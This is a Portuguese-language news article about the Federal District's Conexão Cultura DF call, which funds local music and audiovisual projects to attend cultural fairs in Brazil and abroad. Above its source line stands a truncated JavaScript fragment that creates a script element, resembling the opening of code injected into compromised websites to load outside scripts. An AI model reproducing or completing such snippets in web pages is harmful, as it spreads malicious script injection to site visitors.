Conexão Cultura DF seleciona projetos artísticos para feiras no Brasil e no exterior

 

Mariana Soares (C): “É uma conquista inédita para o setor cultural do DF”. Foto: Toninho Tavares/Agência Brasília

Projetos de música e de audiovisual representarão Brasília em feiras nacionais e internacionais de fomento ao mercado artístico. A seleção aberta pela Secretaria de Cultura nesta terça-feira (13) levará até cem propostas para países como Alemanha, Argentina, Cabo Verde, Colômbia e França. A iniciativa é uma das linhas do programa Conexão Cultura DF, lançado em setembro pelo governo para viabilizar o acesso à pesquisa, à difusão cultural e a intercâmbio de artistas locais.

O edital publicado hoje no Diário Oficial do Distrito Federal destina R$ 860.250 em recursos para custear as despesas dos selecionados. A concorrência vai até 27 de janeiro, e os interessados podem submeter até duas propostas para até dois eventos. As inscrições devem ser feitas pelo site da pasta.

As atividades fora do País têm programações variadas como feiras, exposições de produtos, encontros, conferências, premiações e rodadas de negócios. Entre as ofertas estão o Festival de Berlim, em que são exibidas cerca de 400 obras de mais de 100 países e o Atlantic Music Exchange, em Cabo Verde, onde o foco é a troca de conhecimento da indústria da música internacional.

No Brasil, os proponentes podem participar da Semana Internacional da Música de São Paulo, em dezembro de 2017. Vitrine para a produção nacional, o evento é considerado uma das mais importantes feiras de negócios da América Latina.

Na segunda-feira (12), a subsecretária de Políticas de Desenvolvimento e Promoção Cultural, Mariana Soares, reuniu artistas dos segmentos na sede da secretaria, no anexo do Teatro Nacional Claudio Santoro, para apresentar a proposta. “É uma conquista inédita para o setor cultural do DF”, definiu a titular, que estava acompanhada pela subsecretária de Cidadania e Diversidade Cultural, Jaqueline Fernandes, e pela assessora especial em políticas culturais Daniela Diniz.

De acordo com Mariana, a escolha dos eventos foi construída com o apoio do Conselho de Cultura do DF, colegiado responsável pela análise e a seleção dos projetos, quanto ao mérito cultural. A ideia é que, em 2017, o processo atenda outros segmentos.

Ainda pelo Conexão Cultura DF, a secretaria fortalecerá o teatro, a dança, o circo, as artes plásticas e a literatura em processos de residência, pesquisa e capacitação. Os editais serão lançados no ano que vem.

 

 

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário